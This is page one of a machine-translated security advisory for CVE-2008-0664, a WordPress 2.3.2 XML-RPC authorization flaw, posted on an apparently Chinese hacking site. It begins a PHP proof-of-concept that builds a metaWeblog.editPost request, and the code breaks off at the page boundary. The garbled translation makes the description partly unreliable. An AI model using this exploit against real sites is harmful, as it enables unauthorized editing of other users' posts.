Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
GeoVision Digital Video
Adobe Acrobat and the Re
Samba group_mapping.tdb/
The Sleuth Kit - UNIX-ba
Marvell 88W8361P-BEM1 ch
CS-Cart core / user.php
phpBB Small ShoutBox mod
Outlook Web Access for E
FlexCell Grid ActiveX co
PHP error_log bypasses t
Apple Bonjour for Window
nginx file type error pa
DedeCMS V5.5 Final GetWe
Details of PHP code exec
The VMware 2008-0014 ren
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
DiY - brief loophole ana
Freefloat FTP Server ove
I can with Apache endeav
HP - UX NFS/ONCplus unkn
HP - UX FTPD remote deni
HP - UX DCE can send acr
HP - UX 'useradd' local
HP - UX swagentd remote
HP - UX Numbers local de
HP - UX System under the
HP - UX 'FTPD' unknown r
HP TCP/IP Services for c
From Solaris NFS pages f
From Solaris XScreenSave
Sun Solaris Auditing Ext
Wordpress XML-RPC connection non-authorization operation crack
  Add date: 07/09/2008   Publishing date: 07/09/2008   Hits: 115
Total 4 pages, Current page:1, Jump to page:
 

Issues the date: 2008-02-07
Renewal date: 2008-07-07

Is affected the system:
WordPress WordPress 2.3.2
Not affected system:
WordPress WordPress 2.3.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 27669
CVE(CAN) ID: CVE-2008-0664

WordPress is a section of free forum Blog system.

If has begun using registration, WordPress XML-RPC realizes (xmlrpc.php) to be unable the post_type execution inspection which establishes to the page, this permission long-distance aggressor to the forum submission evil intention requested that changes editor other users posting.

<* origin: Columcille
 
  Link: http://secunia.com/advisories/28823
        http://trac.wordpress.org/ticket/5313
        http://wordpress.org/development/2008/02/wordpress-233/
        https://bugzilla.redhat.com/long_list.cgi?buglist=431547
        http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/
        http://www.debian.org/security/2008/dsa-1601
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

<? php
/**
* POC: XMLRPC Hack
*
*/
$host = ''; // blog url
$page = '/xmlrpc.php';
$data = '<? xml version= " 1.0 "? >
        <methodcall>
                <methodname>metaWeblog.editPost</methodname>
                <params>
                        <value>
                                <i4>post_ID</i4>
                        </value>
                        <value>
                                <string>username</string>
                        </value>
                        <value>

 

Other pages: : 1 * 2 * 3 * 4 * Next>>
Prev:Mozilla the Firefox 2.0.0.15 edition repairs many security cracks Next:ServerView Web connection stack overflow crack

Comment:

Category: Home > System crack
Home